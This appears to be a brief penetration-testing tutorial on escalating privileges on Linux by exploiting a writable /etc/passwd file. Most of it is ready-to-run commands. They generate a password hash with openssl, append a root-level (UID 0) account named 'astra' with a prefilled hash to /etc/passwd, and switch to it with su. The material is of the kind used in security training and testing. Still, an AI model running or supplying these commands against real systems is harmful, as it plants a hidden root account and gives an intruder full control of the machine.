Privilege Escalation: Writing a User to /etc/passwd

Sometimes an application will be misconfigured and will have the capability to read/write to the /etc/passwd file. This code below creates a hashed password and demonstrates how to echo that into the /etc/passwd file.

# generate a password
openssl passwd -1

# manually enter your password below... it will ask twice.

# outputs this hashed password string

# create user in /etc/passwd
echo 'astra:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:astra:/home/astra:/bin/bash' >> /etc/passwd

# switch user
su astra

# id

Further Reading